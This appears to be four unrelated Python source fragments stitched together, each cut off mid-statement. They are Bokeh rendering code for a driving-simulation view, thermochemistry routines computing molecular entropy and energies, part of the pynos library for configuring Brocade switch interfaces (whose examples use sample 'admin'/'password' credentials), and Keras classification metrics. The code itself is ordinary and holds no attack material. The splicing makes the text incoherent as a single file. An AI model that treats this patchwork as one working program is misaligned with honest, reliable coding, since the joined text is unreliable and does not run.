line_dash='dashed') figure = self._figures[figure_index] figure.add_glyph(polygon_source, polygon_glyph) figure.add_glyph(line_source, line_glyph) def _render_mission_goal(self, mission_goal_state: Dict[str, Any], figure_index: int) -> None: """ Render the mission goal. :param mission_goal_state: Mission goal state. :param figure_index: Figure index. """ pose = mission_goal_state['pose'] source = ColumnDataSource(dict( xs=[pose[0]], ys=[pose[1]], heading=[pose[2]] )) self._figures[figure_index].circle_cross( x="xs", y="ys", size=simulation_tile_style['mission_goal_size'], fill_alpha=simulation_tile_style['mission_goal_alpha'], angle="heading", color=simulation_tile_style['mission_goal_color'], line_width=simulation_tile_style['mission_goal_line_width'], source=source ) def _render_expert_trajectory(self, expert_ego_trajectory: Dict[str, Any], figure_index: int) -> None: """ Render expert trajectory. :param expert_ego_trajectory: A list of trajectory states. :param figure_index: Figure index. """ source = extract_source_from_states(expert_ego_trajectory["states"]) glyph = Line(x="xs", y="ys", line_color=simulation_tile_style['expert_color'], line_width=simulation_tile_style['expert_trajectory_line_width']) self._figures[figure_index].add_glyph(source, glyph) def _update_ego_state(self, ego_state: Dict[str, Any], figure_index: int) -> None: """ Update ego state. :param ego_state: A dict of ego states. :param figure_index: Figure index. """ pose = ego_state['pose'] ego_state_se: StateSE2 = StateSE2( x=pose[0], y=pose[1], heading=pose[2] ) ego_corners = [get_front_left_corner(ego_state_se, self._vehicle_parameters.half_length, self._vehicle_parameters.half_width),
* Constants.c_in_cm * Constants.h / (Constants.k_b * temp) s_v = Constants.r * ((x / (np.exp(x) - 1.0)) - np.log(1.0 - np.exp(-x))) s_r = Constants.r * (0.5 + np.log(np.sqrt((8.0 * np.pi**3 * mu_prime * Constants.k_b * temp) / (Constants.h**2) ))) w = 1.0 / (1.0 + (omega_0 / freq)**alpha) s += w * s_v + (1.0 - w) * s_r return s def _q_t_ew(molecule, temp): """ Translational parition function using an exponential well approximation :param molecule: :param temp: :param a: :param k: :return: """ mass = molecule.mass / Constants.amu_to_kg * Constants.amu_to_au a = molecule.ew_a_inv_ang * Constants.inverse_ang_inverse_au k = molecule.ew_k_kcal * Constants.kcal_mol_to_au beta = 1.0 / (Constants.kb_au * temp) def exp_integrand(r, beta, a, b): return r ** 2 * np.exp(- beta * a * np.exp(b * r)) cap_lambda = ((2.0 * mass * np.pi) / (beta * Constants.h_au**2))**1.5 integral = integrate.quad(exp_integrand, 0.0, 10.0, args=(beta, k, a))[0] return 4.0 * np.pi * np.exp(beta * k) * cap_lambda * integral def calc_entropy_ew(molecule, temp): """ Expoential well entropy :param molecule: :param temp: :param a: :param k: :return: """ mass = molecule.mass / Constants.amu_to_kg * Constants.amu_to_au a = molecule.ew_a_inv_ang * Constants.inverse_ang_inverse_au k = molecule.ew_k_kcal * Constants.kcal_mol_to_au q_t = _q_t_ew(molecule, temp) beta = 1.0 / (Constants.kb_au * temp) cap_lambda = ((2.0 * mass * np.pi) / (beta * Constants.h_au ** 2)) ** 1.5 def integrand(r, beta, a, b): return r ** 2 * np.exp(-beta * a * (np.exp(b * r) - 1.0) + b * r) integral = integrate.quad(integrand, 0.0, 10.0, args=(beta, k, a))[0] term_4 = 4.0 * np.pi * (k * beta * cap_lambda / q_t) * integral return Constants.r * (1.5 - k * beta + np.log(q_t) + term_4) def calc_entropy(molecule, method='grimme', temp=298.15, ss='1M', shift=100, w0=100, alpha=4): """ Calculate the entropy :param molecule: (otherm.Molecule) :return: (float) S in J K-1 mol-1 """ # Translational entropy component s_trans = calc_s_trans_pib(molecule, ss=ss, temp=temp) if molecule.n_atoms == 1: # A molecule with only one atom has no rotational/vibrational DOF return s_trans # Rotational entropy component s_rot = calc_s_rot_rr(molecule, temp=temp) # Vibrational entropy component if method.lower() in ('igm', 'ew_rrho'): s_vib = calc_igm_s_vib(molecule, temp) elif method.lower() == 'truhlar': s_vib = calc_truhlar_s_vib(molecule, temp, shift_freq=shift) elif method.lower() in ('grimme', 'no_s_trans', 'ew'): s_vib = calc_grimme_s_vib(molecule, temp, omega_0=w0, alpha=alpha) else: raise NotImplementedError(f'Unsupported method {method}') if method.lower() == 'no_s_trans': return s_rot + s_vib if 'ew' in method.lower(): s_trans = calc_entropy_ew(molecule, temp) return s_trans + s_rot + s_vib return s_trans + s_rot + s_vib def calc_zpe(molecule): """ Calculate the zero point energy of a molecule, contributed to by the real (positive) frequencies :param molecule: (otherm.Molecule) :return: (float) E_ZPE """ zpe = 0.0 for freq in molecule.real_vib_freqs(): zpe += 0.5 * Constants.h * Constants.n_a * Constants.c_in_cm * freq return zpe def calc_internal_vib_energy(molecule, temp): """ Calculate the internal energy from vibrational motion within the IGM :param molecule: (otherm.Molecule) :param temp: (float) :return: (float) U_vib """ e_vib = 0.0 # Final 6 vibrational frequencies are translational/rotational for freq in molecule.real_vib_freqs(): x = freq * Constants.c_in_cm * Constants.h / Constants.k_b e_vib += Constants.r * x * (1.0 / (np.exp(x/temp) - 1.0)) return e_vib def calc_internal_energy(molecule, temp): """ Calculate the internal energy of a molecule :param molecule: (otherm.Molecule) :param temp: (float) Temperature in K :return: (float) U """ zpe = calc_zpe(molecule) e_trns = 1.5 * Constants.r * temp if molecule.is_linear(): # Linear molecules only have two rotational degrees of freedom -> RT e_rot = Constants.r * temp else: # From equipartition with 3 DOF -> 3/2 RT contribution to the energy e_rot = 1.5 * Constants.r * temp e_vib = calc_internal_vib_energy(molecule, temp=temp) return molecule.e + zpe + e_trns + e_rot + e_vib class Molecule: def shift_to_com(self): """Shift a molecules xyzs to the center of mass""" shifted_xyzs = [] for xyz_line in self.xyzs: pos = np.array(xyz_line[1:]) - self.com shifted_xyzs.append(xyz_line[:1] + pos.tolist()) self.xyzs = shifted_xyzs self.com = self.calculate_com() return None def real_vib_freqs(self): """Return the real (positive) vibrational frequencies""" # Vibrational frequencies are all but the 6 smallest (rotational + # translational) and also remove the largest imaginary frequency if # this species is a transtion state excluded_n = 7 if self.is_ts else 6 # Frequencies are sorted high -> low(negative) if self.real_freqs: return [np.abs(freq) for freq in self.freqs[:-excluded_n]] else: return [freq for freq in self.freqs[:-excluded_n] if freq > 0] def calculate_mass(self): """Calculate the molecular mass of this molecule in kg""" atomic_symbols = [xyz[0] for xyz in self.xyzs] masses_amu = [Constants.atomic_masses[elm] for elm in atomic_symbols] return Constants.amu_to_kg * sum(masses_amu) def calculate_com(self): """ Calculate the center of mass (COM :return: (np.ndarray) COM vector """ total_mass = self.mass / Constants.amu_to_kg com_vec = np.zeros(3) # Blank 3D vector for COM vector for xyz_line in self.xyzs: r_vec = np.array(xyz_line[1:]) # Vector for that atom mass = Constants.atomic_masses[xyz_line[0]] com_vec += (1.0 / total_mass) * mass * r_vec return com_vec def pcoords(self): """ Return a tensor where the first dimension is the size of the number of unique atom types in a molecule, the second, the atoms of that type and the third the number of dimensions in the coordinate space (3) :return: (np.ndarray) shape (n, m, 3) """ atom_symbols = list(set(xyz[0] for xyz in self.xyzs)) n_symbols = len(atom_symbols) pcoords = np.zeros(shape=(n_symbols, self.n_atoms, 3)) for i in range(n_symbols): for j in range(self.n_atoms): # Atom symbol needs to match the leading dimension if self.xyzs[j][0] != atom_symbols[i]: continue for k in range(3): # k + 1 as the first element is the atomic symbol pcoords[i, j, k] = self.xyzs[j][k+1] return pcoords def coords(self): """Return a numpy array shape (n_atoms, 3) of (x,y,z) coordinates""" return np.array([np.array(line[1:4]) for line in self.xyzs]) def is_linear(self, cos_angle_tol=0.05): """ Determine if a molecule is linear :param cos_angle_tol: :return: """ coords = self.coords() if len(coords) == 2: return True if len(coords) > 2: vec_atom0_atom1 = normalised_vector(coords[0], coords[1]) is_atom_colinear = [False for _ in range(2, len(coords))] for i in range(2, len(coords)): vec_atom0_atomi = normalised_vector(coords[0], coords[i]) if 1.0 - cos_angle_tol < np.abs( np.dot(vec_atom0_atom1, vec_atom0_atomi)) < 1.0: is_atom_colinear[i - 2] = True if all(is_atom_colinear): return True return False def calculate_thermochemistry(self, temp=298.15, ss='1M', method='grimme', shift=100, w0=100, alpha=4, calc_sym=True, symm_n=None): """ Calculate thermochemical components and the energies U, H, S, G ----------------------------------------------------------------------- :param temp: (float) Temperature in K :param ss: (str) standard state e.g. 1M or 1atm :param method: (str) Method to calculate the entropy :param shift: (float) Shift frequency used in the Truhlar method of calculating vibrational entropy. All harmonic freqencies below this value will be shifted to this value :param w0: (float) ω0 parameter in the Grimme vibrational entropy method :param alpha: (float) α parameter the Grimme vibrational entropy method :param calc_sym: (bool) Force the calculation of symmetry :param symm_n: (int) Override the calculated symmetry number """ # If the calculation of rotational symmetry number σR is requested or # there aren't too many atoms if calc_sym or self.n_atoms < 50: self.sigma_r = calc_symmetry_number(self) # Allow overwriting σR if symm_n: self.sigma_r = symm_n self.s_rot = calc_s_rot_rr(self, temp=temp) self.s = calc_entropy(self, method, temp, ss, shift, w0, alpha) self.u = calc_internal_energy(self, temp) self.h = self.u + Constants.r * temp self.g = self.h - temp * self.s self.g_cont = self.g - self.e return None def __init__(self, filename, is_ts=False, real_freqs=True, k_kcal=0.6183, a_inv_ang=3.10788): """ Molecule initialised from an ORCA output file :param filename: (str) :param is_ts: (bool) Is this species a TS? if so then exclude """ # Is this molecule a transition state, and so should have one imaginary # (negative frequency) self.is_ts = is_ts # Should all non-TS frequencies be made real (positive) self.real_freqs = real_freqs # Harmonic vibrational frequencies in cm-1 self.freqs = extract_frequencies(filename) # Atom positions [[atom, x, y, z], ...] x/y/z in Å self.xyzs = extract_xyzs(filename) self.n_atoms = len(self.xyzs) # Mass in kg self.mass = self.calculate_mass() # Matrix of I values in kg m^2 self.moments_of_inertia = calc_moments_of_inertia(self.xyzs) # Centre of mass np.array shape (3,) x/y/z in Å self.com = self.calculate_com() self.shift_to_com() # Rotational symmetry number self.sigma_r = 1 #
<reponame>bdeetz/pynos<gh_stars>10-100 """ Copyright 2015 Brocade Communications Systems, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from pynos.versions.ver_7.ver_7_0_0.yang.brocade_interface \ import brocade_interface as brcd_intf from pynos.versions.ver_7.ver_7_0_0.yang.brocade_rbridge \ import brocade_rbridge as brcd_rbridge import pynos.utilities from pynos.versions.base.interface import Interface as InterfaceBase from pynos.versions.ver_7.ver_7_0_0.yang.brocade_mac_address_table \ import brocade_mac_address_table from pynos.exceptions import InvalidVlanId from ipaddress import ip_interface import xml.etree.ElementTree as ET class Interface(InterfaceBase): """ The Interface class holds all the actions assocaiated with the Interfaces of a NOS device. Attributes: None """ def __init__(self, callback): super(Interface, self).__init__(callback) self._interface = brcd_intf(callback=pynos.utilities.return_xml) self._rbridge = brcd_rbridge(callback=pynos.utilities.return_xml) self._mac_address_table = brocade_mac_address_table( callback=pynos.utilities.return_xml ) def ip_unnumbered(self, **kwargs): """Configure an unnumbered interface. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). name (str): Name of interface id. (For interface: 1/0/5, 1/0/10 etc). delete (bool): True is the IP address is added and False if its to be deleted (True, False). Default value will be False if not specified. donor_type (str): Interface type of the donor interface. donor_name (str): Interface name of the donor interface. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `int_type`, `name`, `donor_type`, or `donor_name` is not passed. ValueError: if `int_type`, `name`, `donor_type`, or `donor_name` are invalid. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.interface.ip_address(int_type='loopback', ... name='1', ip_addr='4.4.4.4/32', rbridge_id='230') ... int_type = 'tengigabitethernet' ... name = '230/0/20' ... donor_type = 'loopback' ... donor_name = '1' ... output = dev.interface.disable_switchport(inter_type= ... int_type, inter=name) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name, ... get=True) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name, ... delete=True) ... output = dev.interface.ip_address(int_type='loopback', ... name='1', ip_addr='4.4.4.4/32', rbridge_id='230', ... delete=True) ... output = dev.interface.ip_unnumbered(int_type='hodor', ... donor_name=donor_name, donor_type=donor_type, name=name) ... # doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ValueError """ kwargs['ip_donor_interface_name'] = kwargs.pop('donor_name') kwargs['ip_donor_interface_type'] = kwargs.pop('donor_type') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) valid_int_types = ['gigabitethernet', 'tengigabitethernet', 'fortygigabitethernet', 'hundredgigabitethernet'] if kwargs['int_type'] not in valid_int_types: raise ValueError('int_type must be one of: %s' % repr(valid_int_types)) unnumbered_type = self._ip_unnumbered_type(**kwargs) unnumbered_name = self._ip_unnumbered_name(**kwargs) if kwargs.pop('get', False): return self._get_ip_unnumbered(unnumbered_type, unnumbered_name) config = pynos.utilities.merge_xml(unnumbered_type, unnumbered_name) return callback(config) def _ip_unnumbered_name(self, **kwargs): """Return the `ip unnumbered` donor name XML. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). delete (bool): Remove the configuration if ``True``. ip_donor_interface_name (str): The donor interface name (1, 2, etc) Returns: XML to be passed to the switch. Raises: None """ method_name = 'interface_%s_ip_ip_config_unnumbered_ip_donor_'\ 'interface_name' % kwargs['int_type'] ip_unnumbered_name = getattr(self._interface, method_name) config = ip_unnumbered_name(**kwargs) if kwargs['delete']: tag = 'ip-donor-interface-name' config.find('.//*%s' % tag).set('operation', 'delete') return config def _ip_unnumbered_type(self, **kwargs): """Return the `ip unnumbered` donor type XML. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). delete (bool): Remove the configuration if ``True``. ip_donor_interface_type (str): The donor interface type (loopback) Returns: XML to be passed to the switch. Raises: None """ method_name = 'interface_%s_ip_ip_config_unnumbered_ip_donor_'\ 'interface_type' % kwargs['int_type'] ip_unnumbered_type = getattr(self._interface, method_name) config = ip_unnumbered_type(**kwargs) if kwargs['delete']: tag = 'ip-donor-interface-type' config.find('.//*%s' % tag).set('operation', 'delete') return config def _get_ip_unnumbered(self, unnumbered_type, unnumbered_name): """Get and merge the `ip unnumbered` config from an interface. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: unnumbered_type: XML document with the XML to get the donor type. unnumbered_name: XML document with the XML to get the donor name. Returns: Merged XML document. Raises: None """ unnumbered_type = self._callback(unnumbered_type, handler='get_config') unnumbered_name = self._callback(unnumbered_name, handler='get_config') unnumbered_type = pynos.utilities.return_xml(str(unnumbered_type)) unnumbered_name = pynos.utilities.return_xml(str(unnumbered_name)) return pynos.utilities.merge_xml(unnumbered_type, unnumbered_name) def anycast_mac(self, **kwargs): """Configure an anycast MAC address. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). mac (str): MAC address to configure (example: '0011.2233.4455'). delete (bool): True is the IP address is added and False if its to be deleted (True, False). Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `mac` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.services.vrrp(ip_version='6', ... enabled=True, rbridge_id='230') ... output = dev.services.vrrp(enabled=True, ... rbridge_id='230') ... output = dev.services.vrrp(ip_version='6', ... enabled=False, rbridge_id='230') ... output = dev.services.vrrp(enabled=False, ... rbridge_id='230') ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455') ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455', get=True) ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455', delete=True) ... output = dev.services.vrrp(ip_version='6', enabled=True, ... rbridge_id='230') ... output = dev.services.vrrp(enabled=True, ... rbridge_id='230') """ callback = kwargs.pop('callback', self._callback) anycast_mac = getattr(self._rbridge, 'rbridge_id_ip_static_ag_ip_' 'config_anycast_gateway_mac_ip_anycast_' 'gateway_mac') config = anycast_mac(rbridge_id=kwargs.pop('rbridge_id', '1'), ip_anycast_gateway_mac=kwargs.pop('mac')) if kwargs.pop('get', False): return callback(config, handler='get_config') if kwargs.pop('delete', False): config.find('.//*anycast-gateway-mac').set('operation', 'delete') return callback(config) def bfd(self, **kwargs): """Configure BFD for Interface. Args: name (str): name of the interface to configure (230/0/1 etc) int_type (str): interface type (gigabitethernet etc) tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', int_type='tengigabitethernet') ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', ... int_type='tengigabitethernet', get=True) ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', ... int_type='tengigabitethernet', delete=True) """ int_type = str(kwargs.pop('int_type').lower()) kwargs['name'] = str(kwargs.pop('name')) kwargs['min_tx'] = kwargs.pop('tx') kwargs['min_rx'] = kwargs.pop('rx') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) valid_int_types = ['gigabitethernet', 'tengigabitethernet', 'fortygigabitethernet', 'hundredgigabitethernet'] if int_type not in valid_int_types: raise ValueError('int_type must be one of: %s' % repr(valid_int_types)) kwargs['int_type'] = int_type bfd_tx = self._bfd_tx(**kwargs) bfd_rx = self._bfd_rx(**kwargs) bfd_multiplier = self._bfd_multiplier(**kwargs) if kwargs.pop('get', False): return self._get_bfd(bfd_tx, bfd_rx, bfd_multiplier) config = pynos.utilities.merge_xml(bfd_tx, bfd_rx) config = pynos.utilities.merge_xml(config, bfd_multiplier) return callback(config) def _bfd_tx(self, **kwargs): """Return the BFD minimum transmit interval XML. You should not use this method. You probably want `BGP.bfd`. Args: min_tx (str): BFD transmit interval in milliseconds (300, 500, etc) delete (bool): Remove the configuration if ``True``. Returns: XML to be passed to the switch. Raises: None """ int_type = kwargs['int_type'] method_name = 'interface_%s_bfd_interval_min_tx' % int_type bfd_tx = getattr(self._interface, method_name) config = bfd_tx(**kwargs) if kwargs['delete']: tag = 'min-tx' config.find('.//*%s' % tag).set('operation', 'delete') return config def _bfd_rx(self, **kwargs): """Return the BFD minimum receive interval XML. You should not use this method. You probably want `BGP.bfd`. Args: min_rx (str): BFD receive interval in milliseconds (300, 500, etc) delete (bool): Remove the configuration if ``True``. Returns: XML to be passed to the switch. Raises: None """ int_type = kwargs['int_type'] method_name = 'interface_%s_bfd_interval_min_rx' % int_type bfd_rx = getattr(self._interface, method_name) config = bfd_rx(**kwargs) if kwargs['delete']: tag = 'min-rx' config.find('.//*%s' % tag).set('operation', 'delete') pass return config def _bfd_multiplier(self, **kwargs): """Return the BFD multiplier
same rank as `y_true`, and must be broadcastable to `y_true`. Returns: Update op. """ return metrics_utils.update_confusion_matrix_variables( { metrics_utils.ConfusionMatrix.TRUE_POSITIVES: self.true_positives, metrics_utils.ConfusionMatrix.TRUE_NEGATIVES: self.true_negatives, metrics_utils.ConfusionMatrix.FALSE_POSITIVES: self.false_positives, metrics_utils.ConfusionMatrix.FALSE_NEGATIVES: self.false_negatives, }, y_true, y_pred, thresholds=self.thresholds, sample_weight=sample_weight) def reset_states(self): num_thresholds = len(self.thresholds) K.batch_set_value( [(v, np.zeros((num_thresholds,))) for v in self.variables]) @keras_export('keras.metrics.SensitivityAtSpecificity') class SensitivityAtSpecificity(SensitivitySpecificityBase): """Computes the sensitivity at a given specificity. `Sensitivity` measures the proportion of actual positives that are correctly identified as such (tp / (tp + fn)). `Specificity` measures the proportion of actual negatives that are correctly identified as such (tn / (tn + fp)). This metric creates four local variables, `true_positives`, `true_negatives`, `false_positives` and `false_negatives` that are used to compute the sensitivity at the given specificity. The threshold for the given specificity value is computed and used to evaluate the corresponding sensitivity. If `sample_weight` is `None`, weights default to 1. Use `sample_weight` of 0 to mask values. For additional information about specificity and sensitivity, see the following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity Usage: >>> m = tf.keras.metrics.SensitivityAtSpecificity(0.4, num_thresholds=1) >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9]) >>> m.result().numpy() 0.5 >>> m.reset_states() >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9], ... sample_weight=[1, 0, 0, 1]) >>> m.result().numpy() 1.0 Usage with tf.keras API: ```python model = tf.keras.Model(inputs, outputs) model.compile( 'sgd', loss='mse', metrics=[tf.keras.metrics.SensitivityAtSpecificity()]) ``` """ def __init__(self, specificity, num_thresholds=200, name=None, dtype=None): """Creates a `SensitivityAtSpecificity` instance. Args: specificity: A scalar value in range `[0, 1]`. num_thresholds: (Optional) Defaults to 200. The number of thresholds to use for matching the given specificity. name: (Optional) string name of the metric instance. dtype: (Optional) data type of the metric result. """ if specificity < 0 or specificity > 1: raise ValueError('`specificity` must be in the range [0, 1].') self.specificity = specificity self.num_thresholds = num_thresholds super(SensitivityAtSpecificity, self).__init__( specificity, num_thresholds=num_thresholds, name=name, dtype=dtype) def result(self): # Calculate specificities at all the thresholds. specificities = math_ops.div_no_nan( self.true_negatives, self.true_negatives + self.false_positives) # Find the index of the threshold where the specificity is closest to the # given specificity. min_index = math_ops.argmin( math_ops.abs(specificities - self.value), axis=0) min_index = math_ops.cast(min_index, dtypes.int32) # Compute sensitivity at that index. return math_ops.div_no_nan( self.true_positives[min_index], self.true_positives[min_index] + self.false_negatives[min_index]) def get_config(self): config = { 'num_thresholds': self.num_thresholds, 'specificity': self.specificity } base_config = super(SensitivityAtSpecificity, self).get_config() return dict(list(base_config.items()) + list(config.items())) @keras_export('keras.metrics.SpecificityAtSensitivity') class SpecificityAtSensitivity(SensitivitySpecificityBase): """Computes the specificity at a given sensitivity. `Sensitivity` measures the proportion of actual positives that are correctly identified as such (tp / (tp + fn)). `Specificity` measures the proportion of actual negatives that are correctly identified as such (tn / (tn + fp)). This metric creates four local variables, `true_positives`, `true_negatives`, `false_positives` and `false_negatives` that are used to compute the specificity at the given sensitivity. The threshold for the given sensitivity value is computed and used to evaluate the corresponding specificity. If `sample_weight` is `None`, weights default to 1. Use `sample_weight` of 0 to mask values. For additional information about specificity and sensitivity, see the following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity Usage: >>> m = tf.keras.metrics.SpecificityAtSensitivity(0.8, num_thresholds=1) >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9]) >>> m.result().numpy() 1.0 >>> m.reset_states() >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9], ... sample_weight=[1, 0, 0, 1]) >>> m.result().numpy() 1.0 Usage with tf.keras API: ```python model = tf.keras.Model(inputs, outputs) model.compile( 'sgd', loss='mse', metrics=[tf.keras.metrics.SpecificityAtSensitivity()]) ``` """ def __init__(self, sensitivity, num_thresholds=200, name=None, dtype=None): """Creates a `SpecificityAtSensitivity` instance. Args: sensitivity: A scalar value in range `[0, 1]`. num_thresholds: (Optional) Defaults to 200. The number of thresholds to use for matching the given sensitivity. name: (Optional) string name of the metric instance. dtype: (Optional) data type of the metric result. """ if sensitivity < 0 or sensitivity > 1: raise ValueError('`sensitivity` must be in the range [0, 1].') self.sensitivity = sensitivity self.num_thresholds = num_thresholds super(SpecificityAtSensitivity, self).__init__( sensitivity, num_thresholds=num_thresholds, name=name, dtype=dtype) def result(self): # Calculate sensitivities at all the thresholds. sensitivities = math_ops.div_no_nan( self.true_positives, self.true_positives + self.false_negatives) # Find the index of the threshold where the sensitivity is closest to the # requested value. min_index = math_ops.argmin( math_ops.abs(sensitivities - self.value), axis=0) min_index = math_ops.cast(min_index, dtypes.int32) # Compute specificity at that index. return math_ops.div_no_nan( self.true_negatives[min_index], self.true_negatives[min_index] + self.false_positives[min_index]) def get_config(self): config = { 'num_thresholds': self.num_thresholds, 'sensitivity': self.sensitivity } base_config = super(SpecificityAtSensitivity, self).get_config() return dict(list(base_config.items()) + list(config.items())) @keras_export('keras.metrics.PrecisionAtRecall') class PrecisionAtRecall(SensitivitySpecificityBase): """Computes the precision at a given recall. This metric creates four local variables, `true_positives`, `true_negatives`, `false_positives` and `false_negatives` that are used to compute the precision at the given recall. The threshold for the given recall value is computed and used to evaluate the corresponding precision. If `sample_weight` is `None`, weights default to 1. Use `sample_weight` of 0 to mask values. Usage: >>> m = tf.keras.metrics.PrecisionAtRecall(0.8, num_thresholds=1) >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9]) >>> m.result().numpy() 1.0 >>> m.reset_states() >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9], ... sample_weight=[1, 0, 0, 1]) >>> m.result().numpy() 1.0 Usage with tf.keras API: ```python model = tf.keras.Model(inputs, outputs) model.compile( 'sgd', loss='mse', metrics=[tf.keras.metrics.PrecisionAtRecall(recall=0.8)]) ``` """ def __init__(self, recall, num_thresholds=200, name=None, dtype=None): """Creates a `PrecisionAtRecall` instance. Args: recall: A scalar value in range `[0, 1]`. num_thresholds: (Optional) Defaults to 200. The number of thresholds to use for matching the given recall. name: (Optional) string name of the metric instance. dtype: (Optional) data type of the metric result. """ if recall < 0 or recall > 1: raise ValueError('`recall` must be in the range [0, 1].') self.recall = recall self.num_thresholds = num_thresholds super(PrecisionAtRecall, self).__init__( value=recall, num_thresholds=num_thresholds, name=name, dtype=dtype) def result(self): # Calculate recall at all the thresholds. recalls = math_ops.div_no_nan( self.true_positives, self.true_positives + self.false_negatives) # Find the index of the threshold where the recall is closest to the # requested value. min_index = math_ops.argmin( math_ops.abs(recalls - self.value), axis=0) min_index = math_ops.cast(min_index, dtypes.int32) # Compute precision at that index. return math_ops.div_no_nan( self.true_positives[min_index], self.true_positives[min_index] + self.false_positives[min_index]) def get_config(self): config = {'num_thresholds': self.num_thresholds, 'recall': self.recall} base_config = super(PrecisionAtRecall, self).get_config() return dict(list(base_config.items()) + list(config.items())) @keras_export('keras.metrics.RecallAtPrecision') class RecallAtPrecision(SensitivitySpecificityBase): """Computes the maximally achievable recall at a required precision. For a given score-label-distribution the required precision might not be achievable, in this case 0.0 is returned as recall. This metric creates four local variables, `true_positives`, `true_negatives`, `false_positives` and `false_negatives` that are used to compute the recall at the given precision. The threshold for the given precision value is computed and used to evaluate the corresponding recall. If `sample_weight` is `None`, weights default to 1. Use `sample_weight` of 0 to mask values. Usage: >>> m = tf.keras.metrics.RecallAtPrecision(0.8, num_thresholds=1) >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9]) >>> m.result().numpy() 0.5 >>> m.reset_states() >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9], ... sample_weight=[1, 0, 0, 1]) >>> m.result().numpy() 1.0 Usage with tf.keras API: ```python model = tf.keras.Model(inputs, outputs) model.compile( 'sgd', loss='mse', metrics=[tf.keras.metrics.RecallAtPrecision(precision=0.8)]) ``` """ def __init__(self, precision, num_thresholds=200, name=None, dtype=None): """Creates a `RecallAtPrecision` instance. Args: precision: A scalar value in range `[0, 1]`. num_thresholds: (Optional) Defaults to 200. The number of thresholds to use for matching the given precision. name: (Optional) string name of the metric instance. dtype: (Optional) data type of the metric result. """ if precision < 0 or precision > 1: raise ValueError('`precision` must be in the range [0, 1].') self.precision = precision self.num_thresholds = num_thresholds super(RecallAtPrecision, self).__init__( value=precision, num_thresholds=num_thresholds, name=name, dtype=dtype) def result(self): # Calculate precision and recall at all the thresholds. # All recalls are computed, because they are not a monotoneous function of # precision and we want to search for the highest feasible recall. precisions = math_ops.div_no_nan( self.true_positives, self.true_positives + self.false_positives) recalls = math_ops.div_no_nan( self.true_positives, self.true_positives + self.false_negatives) # Find best recall where the precision is as good as required. feasible = array_ops.where(math_ops.greater_equal(precisions, self.value)) feasible_exists = math_ops.greater(array_ops.size(feasible), 0) best_recall = control_flow_ops.cond( feasible_exists, lambda: math_ops.reduce_max(array_ops.gather(recalls, feasible)), lambda: 0.0) return best_recall def get_config(self): config = {'num_thresholds': self.num_thresholds, 'precision': self.precision} base_config = super(RecallAtPrecision, self).get_config() return dict(list(base_config.items()) + list(config.items())) @keras_export('keras.metrics.AUC') class AUC(Metric): """Computes the approximate AUC (Area under the curve) via a Riemann sum. This
